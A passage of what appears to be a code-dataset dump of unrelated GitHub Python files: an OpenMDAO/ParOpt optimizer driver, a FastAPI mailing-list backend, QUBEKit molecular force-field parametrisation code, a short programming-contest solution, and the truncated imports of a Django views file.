is not equal to the\"\n \"number of design variables during initialzation (%d)\" % (i, self.nvars)\n )\n\n return\n\n def evalObjCon(self, x):\n \"\"\"Evaluate the objective and constraint\"\"\"\n\n # Pass the updated design variables back to OpenMDAO\n i = 0\n for name, meta in 
self.om_dvs.items():\n size = meta[\"size\"]\n self.problem.driver.set_design_var(name, x[i : i + size], set_remote=False)\n i += size\n\n # Solve the problem\n self.problem.model._solve_nonlinear()\n\n # Extract the values of the objectives and constraints\n con = np.zeros(self.ncon)\n constr_vals = (\n self.problem.driver.get_constraint_values()\n ) # Returns the global array\n\n i = 0\n # First we extract all inequality constraints\n for name, meta in self.om_con.items():\n if meta[\"equals\"] is None:\n size = meta[\"size\"]\n om_con_vals = np.zeros(size)\n om_con_vals[:] = constr_vals[name][0:size] # Get the local values\n if meta[\"lower\"] > self.constr_lower_limit:\n con[i : i + size] = om_con_vals - meta[\"lower\"]\n i += size\n if meta[\"upper\"] < self.constr_upper_limit:\n con[i : i + size] = meta[\"upper\"] - om_con_vals\n i += size\n\n # Then, extract rest of the equality constraints:\n for name, meta in self.om_con.items():\n if meta[\"equals\"] is not None:\n size = meta[\"size\"]\n om_con_vals = np.zeros(size)\n om_con_vals[:] = constr_vals[name][0:size] # Get the local values\n con[i : i + size] = om_con_vals - meta[\"equals\"]\n i += size\n\n # We only accept the first objective\n obj_vals = self.problem.driver.get_objective_values()\n for name, meta in self.om_obj.items():\n if isinstance(obj_vals[name], float):\n fobj = obj_vals[name]\n else:\n # In parallel, obj_vals will be array w/ len=nprocs,\n # so just take the first value\n fobj = obj_vals[name][0]\n break\n\n fail = 0\n\n return fail, fobj, con\n\n def evalObjConGradient(self, x, g, A):\n \"\"\"Evaluate the objective and constraint gradient\"\"\"\n\n # Extract gradients of objective and constraints w.r.t. all design variables\n objcon_grads = self.problem.compute_totals(get_remote=False)\n\n # Extract the objective gradient\n for name, meta in self.om_obj.items():\n i_dv = 0\n for dv_name in self.om_dvs:\n dv_subsize = self.om_dvs[dv_name][\"size\"]\n g[i_dv : i_dv + dv_subsize] = objcon_grads[(name, dv_name)][0]\n i_dv += dv_subsize\n break\n\n # Extract the constraint gradients\n # We first extract gradients of inequality constraints\n i = 0\n for name, meta in self.om_con.items():\n if meta[\"equals\"] is None:\n if meta[\"lower\"] > self.constr_lower_limit:\n for j in range(meta[\"size\"]):\n i_dv = 0\n for dv_name in self.om_dvs:\n dv_subsize = self.om_dvs[dv_name][\"size\"]\n A[i + j][i_dv : i_dv + dv_subsize] = objcon_grads[\n (name, dv_name)\n ][j]\n i_dv += dv_subsize\n i += meta[\"size\"]\n if meta[\"upper\"] < self.constr_upper_limit:\n for j in range(meta[\"size\"]):\n i_dv = 0\n for dv_name in self.om_dvs:\n dv_subsize = self.om_dvs[dv_name][\"size\"]\n A[i + j][i_dv : i_dv + dv_subsize] = -objcon_grads[\n (name, dv_name)\n ][j]\n i_dv += dv_subsize\n i += meta[\"size\"]\n\n # Then, extract equality constraint gradients\n for name, meta in self.om_con.items():\n if meta[\"equals\"] is not None:\n for j in range(meta[\"size\"]):\n i_dv = 0\n for dv_name in self.om_dvs:\n dv_subsize = self.om_dvs[dv_name][\"size\"]\n A[i + j][i_dv : i_dv + dv_subsize] = objcon_grads[\n (name, dv_name)\n ][j]\n i_dv += dv_subsize\n i += meta[\"size\"]\n\n fail = 0\n\n return fail\n","repo_name":"smdogroup/paropt","sub_path":"paropt/paropt_driver.py","file_name":"paropt_driver.py","file_ext":"py","file_size_in_byte":12005,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"31"} +{"seq_id":"74672925207","text":"import base64\nimport typing\nimport os\nimport datetime\nfrom 
typing import Optional\nfrom email_validator import EmailSyntaxError\nfrom pydantic.errors import EmailError\n\nfrom fastapi import FastAPI, Form, Header, Response, BackgroundTasks\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom dotenv import load_dotenv\nfrom deta import Deta\nfrom pydantic import EmailStr, BaseModel\nfrom mailer import send_registration_mail, send_event_mails\n\n\nload_dotenv()\n\ndeta = Deta(os.getenv(\"DETA_PROJECT_KEY\"))\n\ndb = deta.Base(os.getenv(\"DETA_DB_NAME\"))\nsubscriptions = deta.Base(os.getenv(\"DETA_SUBSCRIPTIONS_DB_NAME\"))\n\napp = FastAPI()\n\nALLOWED_ORIGINS = [\n    \"https://troeptroep.nl\",\n]\n\nif os.getenv(\"DEBUG\"):\n    ALLOWED_ORIGINS.append(\"http://localhost:8000\")\n\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=ALLOWED_ORIGINS,\n    allow_credentials=True,  # no cookies\n    allow_methods=[\"POST\"],\n    allow_headers=[\"*\"],\n)\n\nclass Registration(BaseModel):\n    event_name: str\n    email: EmailStr\n    needs_gear: bool\n    start_time: str\n    location_description: str\n\n@app.post(\"/registrations\", status_code=201)\ndef create_registration(registration: Registration, tasks: BackgroundTasks, x_token: str = Header(None)):\n    if x_token == os.getenv(\"DETA_API_TOKEN\"):\n        obj = db.put(\n            {\n                \"event_name\": registration.event_name,\n                \"email\": registration.email,\n                \"needs_gear\": registration.needs_gear,\n                \"created_at\": str(datetime.datetime.now()),\n            }\n        )\n        tasks.add_task(send_registration_mail, registration, obj[\"key\"])\n\n        return\n    return Response(\n        status_code=401,\n    )\n\n@app.get(\"/subscribe/{email}\", status_code=201)\ndef create_subscription(email: str):\n    email = base64.urlsafe_b64decode(email).decode()\n\n    try:\n        subscriptions.insert(\n            {\n                \"created_at\": str(datetime.datetime.now()),\n            },\n            email\n        )\n    except Exception:\n        return Response(content=\"You are already subscribed to our mailing list\", status_code=304)\n    return Response(content=\"Thanks for subscribing to the TroepTroep event mailing list\", status_code=200)\n\n\n@app.post(\"/subscribe\", status_code=201)\ndef _create_subscription(email: str = Form(...)):\n    try:\n        EmailStr.validate(email)\n    except (EmailError, EmailSyntaxError):\n        return Response(content=\"Invalid email address\", status_code=400)\n\n    try:\n        subscriptions.insert(\n            {\n                \"created_at\": str(datetime.datetime.now()),\n            },\n            email\n        )\n    except Exception:\n        return Response(content=\"You are already subscribed to our mailing list\", status_code=304)\n    return Response(content=\"Thanks for subscribing to the TroepTroep event mailing list\", status_code=200)\n\n\n@app.get(\"/unsubscribe/{email}\", status_code=201)\ndef delete_subscription(email: bytes):\n    subscriptions.delete(base64.urlsafe_b64decode(email).decode())\n    return Response(content=\"You have been removed from our mailing list\", status_code=200)\n\nclass Event(BaseModel):\n    entity: typing.Dict[str, typing.Any]\n\"\"\"\n\"entity\": {\n    \"id\": \"21837152\",\n    \"type\": \"item\",\n    \"attributes\": {\n        \"location\": {\n            \"latitude\": 49.8728253,\n            \"longitude\": 8.6511929\n        },\n        \"meetingpoint_description\": \"wedwede\",\n        \"title\": \"snibbels\",\n        \"starttime\": \"2021-02-22T00:00:00+01:00\",\n        \"endtime\": \"2021-02-22T21:30:00+01:00\",\n        \"date\": \"2021-02-22\",\n        \"city\": \"Amsterdam\",\n        \"updated_at\": \"2021-02-22T21:56:11.268+01:00\",\n        \"created_at\": \"2021-02-22T21:56:11.251+01:00\"\n    },\n\n\"\"\"\n\n@app.post(\"/submit_event\", status_code=204)\ndef run_event_mailer(event: Event, tasks: BackgroundTasks, x_token: str = 
Header(None)):\n    if x_token == os.getenv(\"DETA_API_TOKEN\"):\n        tasks.add_task(send_event_mails, event.entity[\"attributes\"], subscriptions)\n        return\n    return Response(\n        status_code=401,\n    )","repo_name":"DonQueso89/troeptroep","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"24009369798","text":"#!/usr/bin/env python\n\nfrom QUBEKit.decorators import for_all_methods, timer_logger\nfrom QUBEKit.helpers import append_to_log\n\nfrom tempfile import TemporaryDirectory\nfrom shutil import copy\nfrom os import getcwd, chdir, path\nfrom subprocess import run as sub_run\nfrom collections import OrderedDict\nfrom copy import deepcopy\n\nfrom xml.etree.ElementTree import parse as parse_tree\nfrom simtk.openmm import app, XmlSerializer\nfrom openeye import oechem\n\nfrom openforcefield.typing.engines.smirnoff import ForceField\nfrom openforcefield.utils import get_data_filename, generateTopologyFromOEMol\n\n# TODO Users should be able to just install ONE of the necessary parametrisation methods and not worry about needing the others too.\n# Is there a nice way of doing this other than try: import ; except ImportError: pass ?\n\n\nclass Parametrisation:\n    \"\"\"\n    Class of methods which perform the initial parametrisation for the molecule.\n    The Parameters will be stored into the molecule as dictionaries as this is easy to manipulate and convert\n    to a parameter tree.\n\n    Note that all parameters gathered here are indexed from 0,\n    whereas the ligand object indices start from 1 for all networkx related properties such as bonds!\n\n\n    Parameters\n    ----------\n    molecule : QUBEKit molecule object\n\n    input_file : an OpenMM style xml file associated with the molecule object\n\n    fftype : the FF type the molecule will be parametrised with;\n        only needed in the case of gaff or gaff2, else it will be assigned based on the class used.\n\n    Returns\n    -------\n    AtomTypes : dictionary of the atom names, the associated OPLS type and class type stored under number.\n        {0: [C00, OPLS_800, C800]}\n\n    Residues : dictionary of residue names indexed by the order they appear.\n\n    HarmonicBondForce : dictionary of equilibrium distances and force constants stored under the bond tuple.\n        {(0, 1): [eqr=456, fc=984375]}\n\n    HarmonicAngleForce : dictionary of equilibrium angles and force constants stored under the angle tuple.\n\n    PeriodicTorsionForce : dictionary of periodicity, barrier and phase stored under the torsion tuple.\n\n    NonbondedForce : dictionary of charge, sigma and epsilon stored under the original atom ordering.\n    \"\"\"\n\n    def __init__(self, molecule, input_file=None, fftype=None, mol2_file=None):\n\n        self.molecule = molecule\n        self.input_file = input_file\n        self.fftype = fftype\n        self.gaff_types = {}\n\n    def __repr__(self):\n        return f'{self.__class__.__name__}({self.__dict__!r})'\n\n    def gather_parameters(self):\n        \"\"\"\n        This method parses the serialised xml file and collects the parameters ready to pass them\n        to build tree.\n        \"\"\"\n\n        # Try to gather the AtomTypes first\n        for i, atom in enumerate(self.molecule.atom_names):\n            self.molecule.AtomTypes[i] = [atom, 'QUBE_' + str(800 + i),\n                                          str(self.molecule.molecule['input'][i][0]) + str(800 + i),\n                                          self.gaff_types[atom]]\n\n        input_xml_file = 'serialised.xml'\n        in_root = parse_tree(input_xml_file).getroot()\n\n        # Extract all bond data\n        for Bond in in_root.iter('Bond'):\n            bond = (int(Bond.get('p1')), 
int(Bond.get('p2')))\n            self.molecule.HarmonicBondForce[bond] = [Bond.get('d'), Bond.get('k')]\n\n        # Extract all angle data\n        for Angle in in_root.iter('Angle'):\n            angle = int(Angle.get('p1')), int(Angle.get('p2')), int(Angle.get('p3'))\n            self.molecule.HarmonicAngleForce[angle] = [Angle.get('a'), Angle.get('k')]\n\n        # Extract all non-bonded data\n        i = 0\n        for Atom in in_root.iter('Particle'):\n            if \"eps\" in Atom.attrib:\n                self.molecule.NonbondedForce[i] = [Atom.get('q'), Atom.get('sig'), Atom.get('eps')]\n                i += 1\n\n        # Extract all of the torsion data\n        phases = ['0', '3.141592653589793', '0', '3.141592653589793']\n        for Torsion in in_root.iter('Torsion'):\n            tor_string_forward = tuple(int(Torsion.get(f'p{i}')) for i in range(1, 5))\n            tor_string_back = tuple(reversed(tor_string_forward))\n\n            if tor_string_forward not in self.molecule.PeriodicTorsionForce.keys() and tor_string_back not in self.molecule.PeriodicTorsionForce.keys():\n                self.molecule.PeriodicTorsionForce[tor_string_forward] = [\n                    [Torsion.get('periodicity'), Torsion.get('k'), phases[int(Torsion.get('periodicity')) - 1]]]\n            elif tor_string_forward in self.molecule.PeriodicTorsionForce.keys():\n                self.molecule.PeriodicTorsionForce[tor_string_forward].append(\n                    [Torsion.get('periodicity'), Torsion.get('k'), phases[int(Torsion.get('periodicity')) - 1]])\n            elif tor_string_back in self.molecule.PeriodicTorsionForce.keys():\n                self.molecule.PeriodicTorsionForce[tor_string_back].append([Torsion.get('periodicity'),\n                                                                            Torsion.get('k'), phases[\n                    int(Torsion.get('periodicity')) - 1]])\n        # Now we have all of the torsions from the openMM system;\n        # we should check if any torsions we found in the molecule do not have parameters.\n        # If they don't, give them the default 0 parameter; this will not change the energy\n        for tor_list in self.molecule.dihedrals.values():\n            for torsion in tor_list:\n                # change the indexing to check if they match\n                param = tuple(torsion[i] - 1 for i in range(4))\n                if param not in self.molecule.PeriodicTorsionForce.keys() and tuple(reversed(param)) not in self.molecule.PeriodicTorsionForce.keys():\n                    self.molecule.PeriodicTorsionForce[param] = [['1', '0', '0'], ['2', '0', '3.141592653589793'], ['3', '0', '0'], ['4', '0', '3.141592653589793']]\n\n        # Now we need to fill in all blank phases of the Torsions\n        for key in self.molecule.PeriodicTorsionForce.keys():\n            vns = ['1', '2', '3', '4']\n            if len(self.molecule.PeriodicTorsionForce[key]) < 4:\n                # now need to add the missing terms from the torsion force\n                for force in self.molecule.PeriodicTorsionForce[key]:\n                    vns.remove(force[0])\n                for i in vns:\n                    self.molecule.PeriodicTorsionForce[key].append([i, '0', phases[int(i) - 1]])\n        # sort by periodicity using a lambda function\n        for key in self.molecule.PeriodicTorsionForce.keys():\n            self.molecule.PeriodicTorsionForce[key].sort(key=lambda x: x[0])\n\n        # now we need to tag the proper and improper torsions and reorder them so the first atom is the central atom\n        improper_torsions = OrderedDict()\n        for improper in self.molecule.improper_torsions:\n            for key in self.molecule.PeriodicTorsionForce:\n                # for each improper find the corresponding torsion parameters and save\n                if sorted(key) == sorted(tuple([x - 1 for x in improper])):\n                    # if they match tag the dihedral\n                    self.molecule.PeriodicTorsionForce[key].append('Improper')\n                    # replace the key with the strict improper order first atom is center\n                    improper_torsions[tuple([x - 1 for x in improper])] = self.molecule.PeriodicTorsionForce[key]\n\n        torsions = deepcopy(self.molecule.PeriodicTorsionForce)\n        
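# at this point each entry of 'torsions' maps a 4-atom index tuple to four\n        # [periodicity, k, phase] terms, plus an 'Improper' tag for impropers, e.g.\n        # (0, 1, 2, 3): [['1', '0.6', '0'], ['2', '0', '3.141592653589793'], ...] (values illustrative)\n        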
# Remake the torsion store in the ligand\n        self.molecule.PeriodicTorsionForce = OrderedDict((v, k) for v, k in torsions.items() if k[-1] != 'Improper')\n        # now we need to add the impropers at the end of the torsion object\n        for key in improper_torsions.keys():\n            self.molecule.PeriodicTorsionForce[key] = improper_torsions[key]\n\n    def get_gaff_types(self, fftype='gaff', file=None):\n        \"\"\"Convert the pdb file into a mol2 antechamber file and get the gaff atom types\n        and gaff bonds if there were any.\"\"\"\n\n        # call Antechamber to convert if we don't have the mol2 file\n        if file is None:\n            cwd = getcwd()\n\n            # do this in a temp directory as it produces a lot of files\n            pdb = path.abspath(self.molecule.filename)\n            mol2 = path.abspath(f'{self.molecule.name}.mol2')\n            file = mol2\n\n            with TemporaryDirectory() as temp:\n                chdir(temp)\n                copy(pdb, 'in.pdb')\n\n                # call antechamber\n                with open('Antechamber.log', 'w+') as log:\n                    sub_run(f'antechamber -i in.pdb -fi pdb -o out.mol2 -fo mol2 -s 2 -at '\n                            f'{fftype} -c bcc', shell=True, stdout=log)\n\n                # Ensure the command worked\n                if not path.exists('out.mol2'):\n                    raise FileNotFoundError('out.mol2 not found; antechamber failed!')\n\n\n                # now copy the file back from the folder\n                copy('out.mol2', mol2)\n                chdir(cwd)\n\n        # Get the gaff atom types and bonds in case we don't have this info\n        gaff_bonds = {}\n        with open(file, 'r') as mol_in:\n            atoms = False\n            bonds = False\n            for line in mol_in.readlines():\n\n                # TODO Surely this can be simplified?!\n                if '@ATOM' in line:\n                    atoms = True\n                    continue\n                elif '@BOND' in line:\n                    atoms = False\n                    bonds = True\n                    continue\n                elif '@SUBSTRUCTURE' in line:\n                    bonds = False\n                    continue\n                if atoms:\n                    self.gaff_types[self.molecule.atom_names[int(line.split()[0]) - 1]] = str(line.split()[5])\n                if bonds:\n                    try:\n                        gaff_bonds[int(line.split()[1])].append(int(line.split()[2]))\n                    except KeyError:\n                        gaff_bonds[int(line.split()[1])] = [int(line.split()[2])]\n\n        append_to_log(f'GAFF types: {self.gaff_types}', msg_type='minor')\n\n        # Check if the molecule already has bonds; if not, apply these bonds\n        if not list(self.molecule.topology.edges):\n            # add the bonds to the molecule\n            for key, value in gaff_bonds.items():\n                for node in value:\n                    self.molecule.topology.add_edge(key, node)\n\n            self.molecule.update()\n\n            # Warning: this rewrites the pdb file and updates the molecule's filename.\n            # Write a new pdb with the connection information\n            self.molecule.write_pdb(input_type='input', name=f'{self.molecule.name}_qube')\n            self.molecule.filename = f'{self.molecule.name}_qube.pdb'\n            print(f'Molecule connections updated; new pdb file made and used: {self.molecule.name}_qube.pdb')\n            # Update the input file name for the xml\n            self.input_file = f'{self.molecule.name}.xml'\n\n\n@for_all_methods(timer_logger)\nclass XML(Parametrisation):\n    \"\"\"Read in the parameters for a molecule from an XML file and store them into the molecule.\"\"\"\n\n    def __init__(self, molecule, input_file=None, fftype='CM1A/OPLS', mol2_file=None):\n\n        super().__init__(molecule, input_file, fftype, mol2_file)\n\n        self.get_gaff_types(fftype='gaff', file=mol2_file)\n        self.serialise_system()\n        self.gather_parameters()\n        self.molecule.parameter_engine = 'XML input ' + self.fftype\n\n    def serialise_system(self):\n        \"\"\"Serialise the input XML system using openmm.\"\"\"\n\n        pdb = app.PDBFile(self.molecule.filename)\n        modeller = app.Modeller(pdb.topology, pdb.positions)\n\n        if self.input_file:\n            forcefield = app.ForceField(self.input_file)\n        else:\n            try:\n                forcefield = app.ForceField(self.molecule.name + '.xml')\n            except 
FileNotFoundError:\n raise FileNotFoundError('No .xml type file found.')\n\n system = forcefield.createSystem(modeller.topology, nonbondedMethod=app.NoCutoff, constraints=None)\n\n xml = XmlSerializer.serializeSystem(system)\n with open('serialised.xml', 'w+') as out:\n out.write(xml)\n\n\n@for_all_methods(timer_logger)\nclass XMLProtein(Parametrisation):\n \"\"\"Read in the parameters for a protein from the QUBEKit_general XML file and store them into the protein.\"\"\"\n\n def __init__(self, protein, input_file='QUBE_general_pi.xml', fftype='CM1A/OPLS'):\n\n super().__init__(protein, input_file, fftype)\n\n self.serialise_system()\n self.gather_parameters()\n self.molecule.parameter_engine = 'XML input ' + self.fftype\n\n def serialise_system(self):\n \"\"\"Serialise the input XML system using openmm.\"\"\"\n\n pdb = app.PDBFile(self.molecule.filename)\n modeller = app.Modeller(pdb.topology, pdb.positions)\n\n if self.input_file:\n forcefield = app.ForceField(self.input_file)\n else:\n try:\n forcefield = app.ForceField(self.molecule.name + '.xml')\n except FileNotFoundError:\n raise FileNotFoundError('No .xml type file found.')\n\n system = forcefield.createSystem(modeller.topology, nonbondedMethod=app.NoCutoff, constraints=None)\n\n xml = XmlSerializer.serializeSystem(system)\n with open('serialised.xml', 'w+') as out:\n out.write(xml)\n\n def gather_parameters(self):\n \"\"\"This method parses the serialised xml file and collects the parameters ready to pass them\n to build tree.\n \"\"\"\n\n # Try to gather the AtomTypes first\n for i, atom in enumerate(self.molecule.atom_names):\n self.molecule.AtomTypes[i] = [atom, 'QUBE_' + str(i),\n str(self.molecule.molecule['input'][i][0]) + str(i)]\n\n input_xml_file = 'serialised.xml'\n in_root = parse_tree(input_xml_file).getroot()\n\n # Extract all bond data\n for Bond in in_root.iter('Bond'):\n self.molecule.HarmonicBondForce[(int(Bond.get('p1')), int(Bond.get('p2')))] = [Bond.get('d'), Bond.get('k')]\n\n # before we continue update the protein class\n self.molecule.update()\n\n # Extract all angle data\n for Angle in in_root.iter('Angle'):\n self.molecule.HarmonicAngleForce[int(Angle.get('p1')), int(Angle.get('p2')), int(Angle.get('p3'))] = [\n Angle.get('a'), Angle.get('k')]\n\n # Extract all non-bonded data\n i = 0\n for Atom in in_root.iter('Particle'):\n if \"eps\" in Atom.attrib:\n self.molecule.NonbondedForce[i] = [Atom.get('q'), Atom.get('sig'), Atom.get('eps')]\n i += 1\n\n # Extract all of the torsion data\n phases = ['0', '3.141592653589793', '0', '3.141592653589793']\n for Torsion in in_root.iter('Torsion'):\n tor_string_forward = tuple(int(Torsion.get(f'p{i}')) for i in range(1, 5))\n tor_string_back = tuple(reversed(tor_string_forward))\n\n if tor_string_forward not in self.molecule.PeriodicTorsionForce.keys() and tor_string_back not in self.molecule.PeriodicTorsionForce.keys():\n self.molecule.PeriodicTorsionForce[tor_string_forward] = [\n [Torsion.get('periodicity'), Torsion.get('k'), phases[int(Torsion.get('periodicity')) - 1]]]\n elif tor_string_forward in self.molecule.PeriodicTorsionForce.keys():\n self.molecule.PeriodicTorsionForce[tor_string_forward].append(\n [Torsion.get('periodicity'), Torsion.get('k'), phases[int(Torsion.get('periodicity')) - 1]])\n elif tor_string_back in self.molecule.PeriodicTorsionForce.keys():\n self.molecule.PeriodicTorsionForce[tor_string_back].append([Torsion.get('periodicity'),\n Torsion.get('k'), phases[\n int(Torsion.get('periodicity')) - 1]])\n # Now we have all of the torsions from 
the openMM system;\n        # we should check if any torsions we found in the molecule do not have parameters.\n        # If they don't, give them the default 0 parameter; this will not change the energy\n        for tor_list in self.molecule.dihedrals.values():\n            for torsion in tor_list:\n                # change the indexing to check if they match\n                param = tuple(torsion[i] - 1 for i in range(4))\n                if param not in self.molecule.PeriodicTorsionForce.keys() and tuple(\n                        reversed(param)) not in self.molecule.PeriodicTorsionForce.keys():\n                    self.molecule.PeriodicTorsionForce[param] = [['1', '0', '0'], ['2', '0', '3.141592653589793'],\n                                                                 ['3', '0', '0'], ['4', '0', '3.141592653589793']]\n\n        # Now we need to fill in all blank phases of the Torsions\n        for key in self.molecule.PeriodicTorsionForce.keys():\n            vns = ['1', '2', '3', '4']\n            if len(self.molecule.PeriodicTorsionForce[key]) < 4:\n                # now need to add the missing terms from the torsion force\n                for force in self.molecule.PeriodicTorsionForce[key]:\n                    vns.remove(force[0])\n                for i in vns:\n                    self.molecule.PeriodicTorsionForce[key].append([i, '0', phases[int(i) - 1]])\n        # sort by periodicity using a lambda function\n        for key in self.molecule.PeriodicTorsionForce.keys():\n            self.molecule.PeriodicTorsionForce[key].sort(key=lambda x: x[0])\n\n        # now we need to tag the proper and improper torsions and reorder them so the first atom is the central atom\n        improper_torsions = OrderedDict()\n        for improper in self.molecule.improper_torsions:\n            for key in self.molecule.PeriodicTorsionForce:\n                # for each improper find the corresponding torsion parameters and save\n                if sorted(key) == sorted(tuple([x - 1 for x in improper])):\n                    # if they match tag the dihedral\n                    self.molecule.PeriodicTorsionForce[key].append('Improper')\n                    # replace the key with the strict improper order first atom is center\n                    improper_torsions[tuple([x - 1 for x in improper])] = self.molecule.PeriodicTorsionForce[key]\n\n        torsions = deepcopy(self.molecule.PeriodicTorsionForce)\n        # now we should remake the torsion store in the ligand\n        self.molecule.PeriodicTorsionForce = OrderedDict((v, k) for v, k in torsions.items() if k[-1] != 'Improper')\n        # now we need to add the impropers at the end of the torsion object\n        for key in improper_torsions.keys():\n            self.molecule.PeriodicTorsionForce[key] = improper_torsions[key]\n\n\n@for_all_methods(timer_logger)\nclass AnteChamber(Parametrisation):\n    \"\"\"\n    Use AnteChamber to parametrise the Ligand first using gaff or gaff2,\n    then build and export the xml tree object.\n    \"\"\"\n\n    def __init__(self, molecule, input_file=None, fftype='gaff', mol2_file=None):\n\n        super().__init__(molecule, input_file, fftype, mol2_file)\n\n        # Initialise the amber file attributes before antechamber_cmd() fills them in\n        self.prmtop = None\n        self.inpcrd = None\n\n        self.antechamber_cmd()\n        self.serialise_system()\n        self.gather_parameters()\n        self.molecule.parameter_engine = 'AnteChamber ' + self.fftype\n\n    def serialise_system(self):\n        \"\"\"Serialise the amber style files into an openmm object.\"\"\"\n\n        prmtop = app.AmberPrmtopFile(self.prmtop)\n        system = prmtop.createSystem(nonbondedMethod=app.NoCutoff, constraints=None)\n\n        with open('serialised.xml', 'w+') as out:\n            out.write(XmlSerializer.serializeSystem(system))\n\n    def antechamber_cmd(self):\n        \"\"\"Method to run Antechamber, parmchk2 and tleap.\"\"\"\n\n        # file paths when moving in and out of temp locations\n        cwd = getcwd()\n        input_file = path.abspath(self.molecule.filename)\n        mol2 = path.abspath(f'{self.molecule.name}.mol2')\n        frcmod_file = path.abspath(f'{self.molecule.name}.frcmod')\n        prmtop_file = 
path.abspath(f'{self.molecule.name}.prmtop')\n        inpcrd_file = path.abspath(f'{self.molecule.name}.inpcrd')\n        ant_log = path.abspath('Antechamber.log')\n\n        # Call Antechamber\n        self.get_gaff_types(fftype=self.fftype)\n\n        # Work in a temp directory due to the amount of files made by antechamber\n        with TemporaryDirectory() as temp:\n            chdir(temp)\n            copy(mol2, 'out.mol2')\n\n\n            # Run parmchk\n            with open('Antechamber.log', 'a') as log:\n                sub_run(f\"parmchk2 -i out.mol2 -f mol2 -o out.frcmod -s {self.fftype}\", shell=True, stdout=log)\n\n            # Ensure the command worked\n            if not path.exists('out.frcmod'):\n                raise FileNotFoundError('out.frcmod not found; parmchk2 failed!')\n\n            # Now get the files back from the temp folder\n            copy('out.mol2', mol2)\n            copy('out.frcmod', frcmod_file)\n            copy('Antechamber.log', ant_log)\n\n        # Now we need to run tleap to get the prmtop and inpcrd files\n        with TemporaryDirectory() as temp:\n            chdir(temp)\n            copy(mol2, 'in.mol2')\n            copy(frcmod_file, 'in.frcmod')\n            copy(ant_log, 'Antechamber.log')\n\n            # make the tleap command file\n            with open('tleap_commands', 'w+') as tleap:\n                tleap.write(\"\"\"source oldff/leaprc.ff99SB\n                               source leaprc.gaff\n                               LIG = loadmol2 in.mol2\n                               check LIG\n                               loadamberparams in.frcmod\n                               saveamberparm LIG out.prmtop out.inpcrd\n                               quit\"\"\")\n\n            # Now run tleap\n            with open('Antechamber.log', 'a') as log:\n                sub_run('tleap -f tleap_commands', shell=True, stdout=log)\n\n            # Check the results are present\n            if not path.exists('out.prmtop') or not path.exists('out.inpcrd'):\n                raise FileNotFoundError('Neither out.prmtop nor out.inpcrd found; tleap failed!')\n\n            copy('Antechamber.log', ant_log)\n            copy('out.prmtop', prmtop_file)\n            copy('out.inpcrd', inpcrd_file)\n        chdir(cwd)\n\n        # Now give the file names to the parametrisation method\n        self.prmtop = f'{self.molecule.name}.prmtop'\n        self.inpcrd = f'{self.molecule.name}.inpcrd'\n\n\n@for_all_methods(timer_logger)\nclass OpenFF(Parametrisation):\n    \"\"\"\n    This class uses the OpenFF toolkit with OpenEye to parametrise the molecule using the smirnoff99Frosst forcefield.\n    A serialised XML is then stored in the parameter dictionaries.\n    \"\"\"\n\n    def __init__(self, molecule, input_file=None, fftype='frost', mol2_file=None):\n        super().__init__(molecule, input_file, fftype, mol2_file)\n\n        self.get_gaff_types(file=mol2_file)\n        self.serialise_system()\n        self.gather_parameters()\n        self.molecule.parameter_engine = 'OpenFF ' + self.fftype\n\n    def serialise_system(self):\n        \"\"\"Create the OpenMM system; parametrise using frost; serialise the system.\"\"\"\n\n        # Load the molecule using OpenEye tools\n        mol = oechem.OEGraphMol()\n        ifs = oechem.oemolistream(self.molecule.filename)\n        flavor = oechem.OEIFlavor_Generic_Default | oechem.OEIFlavor_MOL2_Default | oechem.OEIFlavor_MOL2_Forcefield\n        ifs.SetFlavor(oechem.OEFormat_MOL2, flavor)\n        oechem.OEReadMolecule(ifs, mol)\n        oechem.OETriposAtomNames(mol)\n\n        # Load a SMIRNOFF small molecule forcefield for alkanes, ethers, and alcohols\n        forcefield = ForceField(get_data_filename('forcefield/smirnoff99Frosst.offxml'))\n\n        # Create the OpenMM system\n        topology = generateTopologyFromOEMol(mol)\n        system = forcefield.createSystem(topology, [mol])\n\n        # Serialise the OpenMM system into the xml file\n        with open('serialised.xml', 'w+') as out:\n            out.write(XmlSerializer.serializeSystem(system))\n\n\n@for_all_methods(timer_logger)\nclass BOSS(Parametrisation):\n    \"\"\"\n    This class uses the BOSS software to parametrise a molecule using the CM1A/OPLS FF.\n    The parameters are then stored in the parameter 
dictionaries.\n    \"\"\"\n\n    # TODO make sure order is consistent with PDB.\n    def __init__(self, molecule, input_file=None, fftype='CM1A/OPLS'):\n        super().__init__(molecule, input_file, fftype)\n\n        self.BOSS_cmd()\n        self.gather_parameters()\n        self.molecule.parameter_engine = 'BOSS ' + self.fftype\n\n    def BOSS_cmd(self):\n        \"\"\"\n        This method is used to call the required BOSS scripts.\n        1 The zmat file with CM1A charges is first generated for the molecule keeping the same pdb order.\n        2 A single point calculation is done.\n        \"\"\"\n\n        pass\n\n    def gather_parameters(self):\n        \"\"\"\n        This method parses the BOSS out file and collects the parameters ready to pass them\n        to build tree.\n        \"\"\"\n\n        pass\n","repo_name":"jthorton/QUBEKitdev","sub_path":"QUBEKit/parametrisation.py","file_name":"parametrisation.py","file_ext":"py","file_size_in_byte":25366,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"32292587181","text":"'''\n9375 Fashion King Shin Haebin\nDifficulty: Silver 3\n'''\nimport sys\nfrom collections import defaultdict\n\ninput = sys.stdin.readline\n\nt = int(input().rstrip())\n\nfor _ in range(t):\n    wears = defaultdict(list)\n    n = int(input().rstrip())\n    for i in range(n):\n        now = list(map(str, input().rstrip().split()))\n        wears[now[1]].append(now[0])\n\n    nums = [len(wears[i]) + 1 for i in wears.keys()]\n    result = 1\n    for num in nums:\n        result *= num\n\n    print(result - 1)","repo_name":"hyo37009/2022-summer-study","sub_path":"백준/9375 패션왕 신해빈.py","file_name":"9375 패션왕 신해빈.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70819386968","text":"from django.shortcuts import HttpResponse\nfrom django.shortcuts import render\nfrom django.views.generic import TemplateView\n\nimport requests\nfrom urllib.request import Request, urlopen\nfrom itertools import cycle\nimport traceback\n\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nimport 